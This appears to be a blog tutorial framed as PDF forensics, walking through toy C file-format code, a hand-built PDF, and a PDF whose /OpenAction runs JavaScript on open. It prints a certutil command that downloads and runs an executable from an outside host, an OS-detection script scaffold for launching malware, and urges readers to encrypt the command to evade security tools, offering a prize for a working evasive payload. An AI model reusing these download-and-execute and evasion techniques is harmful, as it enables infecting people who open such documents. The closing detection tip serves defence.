Developing Ransomware Malware. 0x08
Writing Our Own Ransomware Malware for understand how the Cybercriminal write it.
Forensic Investigation - PDF File. 0x03
In previous Chapters for Forensics we learnt :
In this chapter we will learn???
Lets rock ??
If you know how hackers create and deploy malware in PDF files, you can easily reverse engineer the process , called as PDF file forensic ???
Before starting anything let's try to first understand what “Files” are.?
Files are data structures which “write” data to disk or in RAM, as per the predefined structure and can be “read” in the same way, you cannot bypass the structure. Nowadays this data structure can be more complex. Earlier it was just a simple Text file ?? e.g. .txt , .c, .conf.
Why are these files complex ??
If it has a Graphical User Interface, Images, Video, Audio, Layers, Pictures, Fonts, Text, and on an on…. It will be a really complex data structure - In short the more the data is captured the greater complexity of the? file structure is,? This is because everything in the file must be presented to the user exactly as it was saved. The file Reader or Editor must compile it using a keyword which say's "what you save is what you get" method.??
Some file formats allow scripts for automation. This helps client applications to integrate the file formats into the client's custom application through API integration. Compared to other simple file structures the script enables file structures are really complex
- Well-Come to the world of complexity ??.
The more complex the structure, the more likely it is for developers to make mistakes, which is good for hackers ??.
If you have to create a proprietary file structure , then you need to make your own Viewer, Editor and Reader. For example if PDF has created its own proprietary file structure called as “.PDF” , then they have to develop an application such as “Adobe Viewer” to view the .pdf files , “Adobe DC-Editor” for editing the PDF files and “Adobe API” which will allow the PDF file to get read and write access in a 3rd party application by using their API. This will only be done if you want your file’s to be used by the “world”.?
Or else you can make your own file structure , only to be opened by your custom application. For example SAP , the files are open only, if you have SAP installed.??
I love hackers, they find some or other way to get access to files and hack them ???
Let's understand this, the below image shows a .JPG file open in notepad editor. This is how it will look, all gibberish, however if you open the same file in Browser or a “JPG Viewer” you can see the beautiful image. That means the JPG file structure can be opened only if you know its structure.
Let's start by creating our own file structure. We will call it ``.qrc'' meaning this will be a “QRC” proprietary file, which will be open in the QRC develop application, reader? or? editor.?
Lets makes our hand dirty ??
?
We need to make two applications or command line programs. As this is a demo, so we will not go into the long process of writing a GUI application , we will stick to the command line program.?
The first app will be created as ”qrc_writer.exe “ assuming which is equivalent to the “DC-Adobe Editor” ??,? which will create our own file structure called “proprietary.qrc”? e.g. the DC-Adobe Editor creates a ”.pdf” the same way we will create “.qrc” minus GUI.?
The second app is “qrc_reader.exe” which is equivalent to “Adobe Reader”. Our code will read our own proprietary format for the data the user has saved .?
NOTE: The code for qrc_writer.c and qrc_reader.c are just for file structure understanding purposes, the actual ".pdf" and its application are really complex.?
Following is the code for "qrc_writer.c" which create our ".qrc" files
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct {
char FileName[50];
struct {
char Date[20];
char EditedBy[50];
char ModifiedBy[50];
char Owner[50];
} Metadata;
struct {
char Heading1[100];
char Heading2[100];
char Comments[200];
} Headings;
char Text[500];
} FileData;
void writeFile(FileData data, const char *filename) {
FILE *file = fopen(filename, "ab");
if (!file) {
perror("Unable to open file");
exit(1);
}
fwrite(&data, sizeof(FileData), 1, file);
fclose(file);
}
void inputFileData(FileData *data) {
printf("Enter your Name: ");
scanf(" %[^\n]%*c", data->FileName);
printf("Enter Date (YYYY-MM-DD): ");
scanf(" %[^\n]%*c", data->Metadata.Date);
printf("Enter passwd : ");
scanf(" %[^\n]%*c", data->Metadata.EditedBy);
printf("Enter ModifiedBy: ");
scanf(" %[^\n]%*c", data->Metadata.ModifiedBy);
printf("Enter Owner: ");
scanf(" %[^\n]%*c", data->Metadata.Owner);
printf("Enter Heading1: ");
scanf(" %[^\n]%*c", data->Headings.Heading1);
printf("Enter Heading2: ");
scanf(" %[^\n]%*c", data->Headings.Heading2);
printf("Enter Comments: ");
scanf(" %[^\n]%*c", data->Headings.Comments);
printf("Enter Text: ");
scanf(" %[^\n]%*c", data->Text);
}
int main() {
FileData data;
char choice;
do {
inputFileData(&data);
writeFile(data, "proprietary.qrc");
printf("File written successfully.\n");
printf("Do you want to enter another record? (y/n): ");
scanf(" %c", &choice);
} while (choice == 'y' || choice == 'Y');
return 0;
}
The above code will create a file called “proprietary.qrc” which can only be readable with our own reader called “qrc_reader.exe” .
To compile “qrc_writer.c” .
D:\> cl qrc_writer.c
Below is the code for "qrc_reader.c" which will read only “proprietary.qrc” files
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct {
char FileName[50];
struct {
char Date[20];
char EditedBy[50];
char ModifiedBy[50];
char Owner[50];
} Metadata;
struct {
char Heading1[100];
char Heading2[100];
char Comments[200];
} Headings;
char Text[500];
} FileData;
void readFile(const char *filename) {
FILE *file = fopen(filename, "rb");
if (!file) {
perror("Unable to open file");
exit(1);
}
FileData data;
while (fread(&data, sizeof(FileData), 1, file)) {
printf("Name: %s\n", data.FileName);
printf("Date: %s\n", data.Metadata.Date);
printf("passwd: %s\n", data.Metadata.EditedBy);
printf("ModifiedBy: %s\n", data.Metadata.ModifiedBy);
printf("Owner: %s\n", data.Metadata.Owner);
printf("Heading1: %s\n", data.Headings.Heading1);
printf("Heading2: %s\n", data.Headings.Heading2);
printf("Comments: %s\n", data.Headings.Comments);
printf("Text: %s\n", data.Text);
printf("---------------------------------\n");
}
fclose(file);
}
int main() {
readFile("proprietary.qrc");
return 0;
}
You can compile with with
D:\vmShare\Guru> cl qrc_reader.c
You can see the qrc_writer.exe and qrc_reader.exe in action in the below image.
What is important to note in the above code is the file structure. The data will be saved as a defined structure in the file called “proprietary.qrc”.
?Structures are very important , it is the rule book to write the file in the same way and to retrieve the saved data in the same structured way, if you cannot retrieve the data in the structured way you will not get right data, all gibberish letters you can see , which we saw in the first image.??
In the same way Adobe PDF has their own proprietary structure. They have not shared their file structure with any one. However Hackers do have their own way to find things, By doing Reverse Engineering to the PDF file, they have found some vulnerabilities.
But why PDF file why not other file???
PDF file is the world's favorite file and most popular business document format used till date, just imagine the flow of PDF on the internet. If someone finds vulnerabilities in this document. How much danger it can cause. And human trust factors have also slowly developed with PDF files.?
Anyway, let's exploit and do forensic investigation on a PDF file.?
Whatever file structure the hacker community has reverse engineered with that? cybercriminal can hack the remote users.?
Lets understand PDF file basic structure .
A Very simple pdf file structure ??
test.pdf
%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 595 842] /Contents 4 0 R >>
endobj
4 0 obj
<< /Length 51 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello, world!) Tj
ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000010 00000 n
0000000059 00000 n
0000000114 00000 n
0000000217 00000 n
trailer
<< /Size 5 /Root 1 0 R >>
startxref
312
%%EOF
If you just copy and paste the above code in a notepad and save with doublequotes like this “test.pdf” and the “Save as Type” to “All files (*.*), this test.pdf file will open in Browser as a PDF file without any error, try this ??.?
However, If you try to open this file in Adobe Reader, you will get a cross reference error, as the reference table is not calculated here.?
Below image shows how we can just copy the above text? to “test.pdf” file and create a PDF file in notepad, which has a basic PDF structure.
领英推荐
Note : pls save the file in “text.pdf”, using double quotes, or else notepad will append “.txt” to the file name you have provided. for example , if you just type text.pdf and press save button , the file name will be named as “test.pdf.txt “ , so its import to save the file in “quotes'' and the? “Save as Type” to “All files(*.*)”.?
Once the file is saved in the notepad as “test.pdf” , we can open the our "test.pdf" file in any web browser,? the web browser opens the file gracefully , without any error.?
The below image shows the “test.pdf” file can be open successfully in the web browser.
It's amazing right ! ?? , we have not created the file from Adobe PDF Editor, we just copied the above text and pasted in the notepad and magically it created a PDF file. Why??
This is because we know the basic structure of PDF now and as per PDF requirement we have written it's basic structure through notepad. Once our test.pdf file is opened in the browser, the web browser reads the structure and thinks this is a PDF and opens it in PDF format through its Adobe PDF reader API .?
That great lets understand the structure we have created.?
%PDF-1.4
This is called “The header”, ?it’s the first part of the PDF file and specifies the version of the PDF. This is also called the magic word; it's the signature of the PDF file, every file has there own signature. Any application will read these bytes and will assume it is a PDF file . once assumed they will get the PDF structure and start reading it.
This is the BODY part
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 595 842] /Contents 4 0 R >>
endobj
4 0 obj
<< /Length 51 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello, world!) Tj
ET
endstream
endobj
The body contains the actual content of the document, which includes various objects such as text, images, fonts, annotations, and more. These objects are defined in a tree-like structure called the "document catalog."
Each object in the body is identified by an object number and a generation number. Objects are defined like this:
1 0 obj
<< /Type /Catalog
/Pages 2 0 R
>>
endo
This is cross-reference table
xref
0 4
0000000000 65535 f
0000000010 00000 n
0000000093 00000 n
0000000175 00000 n
The cross-reference table (xref table) provides byte offsets of all the objects within the file, so that they can be quickly located. It starts with the keyword xref and is followed by the object numbers and their corresponding byte offsets.
This is the trailer
trailer
<<
/Size 22
/Root 1 0 R
/Info 5 0 R
>>
startxref
655
%%EOF
The trailer contains information about the structure of the document. It points to the start of the cross-reference table and contains the root object, which is the document catalog. It also includes the size of the cross-reference table and an optional ID for the document.
Only with the Header, BODY, CROSS-REFERENCE TABLE and TRAILER . the basic PDF structure is ready ??
Once you understand where to write JavaScript which gets executed when the document opens. You may write more complex JavaScript's which can download malware and execute it for testing.?
For this demo I am just executing the JavaScript alert() function which says “Welcome to the world of malware.”?
You can be really creative, you? can add an OS specific command which will get executed. For Linux you can run .sh files or elf files. For windows you can execute scripts which can be downloaded and get executed when the document is opened by the user, installing the trojan or malware ?whatever... ??.
If you want to execute the script OS wise this JavaScript is really good to start. Its check the OS and and execute script as per the OS?
JavaScript executes as per OS flavor.
function allWindowsFunction() {
console.log("Windows malware needs to be called.");
// Add your Windows-specific code here
}
function unixFunction() {
console.log("Unix malware needs to be called.");
// Add your Unix-specific code here
}
function detectOS() {
let platform = navigator.platform.toLowerCase();
if (platform.indexOf('win') !== -1) {
allWindowsFunction();
} else if (platform.indexOf('mac') !== -1 || platform.indexOf('linux') !== -1 || platform.indexOf('unix') !== -1) {
unixFunction();
} else {
console.log("Unknown OS.");
}
}
detectOS();
Just for information and for snort rule, The one of the following commands which is well known in the malware world is as listed below is this.
javascript
a=eval("certutil -urlcache -split -f https://www.aquasan.co.in/calc.exe & calc.exe");
This script will download calc.exe from a web site and will execute it. It takes little time to download.??
Below image show that in action ??
If you execute the script directly in the malicious PDF which we are going to create? , it will not run. Because , in the previous chapter : packet sniffing of the network, we learned that, if we find the keyword as “.exe” , the respective security application will drop the packet.?
All well known Browsers run in sandboxes, so they can? Block an “.exe file”.?
Then how to execute it.?
The best way is to encrypt the complete command in some encrypted way and then execute it , for example. Create a JavaScript to decrypt the command and then execute it, this logic can be integrated in the malicious PDF ??.
Try it, once you have done this successfully , please ping me on LinkedIn. The best script will get a surprise from me, believe me you will love it. It should get executed in the latest chrome browser. ??.
Let's add JavaScript which will be executed when the user opens a PDF file, we will display an alert message when the user opens the PDF document.??
OK let's modify the PDF structure in the notepad which will execute the JavaScript and show an alert message.?
Open notepad and save Demo02.pdf in it and save it.
%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction << /S /JavaScript /JS
(app.alert('Welcome to the world of malware.');) >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 595 842] /Contents 4 0 R >>
endobj
4 0 obj
<< /Length 51 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello, world!) Tj
ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000010 00000 n
0000000059 00000 n
0000000114 00000 n
0000000217 00000 n
trailer
<< /Size 5 /Root 1 0 R >>
startxref
312
%%EOF
?You can see from the above code snippet , we have just added this ??
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction << /S /JavaScript /JS
(app.alert('Welcome to the world of malware.');) >> >>
endobj
The? app.alert('Welcome to the world of malware.'); is the JavaScript which is getting executed when the document is opened. The only thing to remember is we have to use “ /OpenAction << /S /JavaScript /JS “ which triggers the execution of the JavaScript.?
Below image demonstrates the execution of our javaScript in the demo02.pdf file, when a user open it.
Now you know one of the many ways cybercriminals modify the PDF file and send it to victims.?
Now whenever you receive a PDF file and you are not comfortable opening it, don't hesitate to open that PDF file in your favorite editor, before doing this pls make a copy of it and save it in another location , sometime it may corrupt the original file and you will not have the original file.?
Once you make a copy of your PDF file open in any text editor, find the keyword “/OpenAction << /S /JavaScript /JS” ?to know if it contains any javaScript or not, If it contains then pls pls pls dont execute it.? Escalate this to your Administrator ??
There are many tools on the internet for looking inside the PDF file , searching for one for your further analysis.?
That's it for now ??
In the next chapter we will be looking into? Microsoft Word and Excel files for any malware integration.?
Thanks a lot for reading ??
See you next week.? ??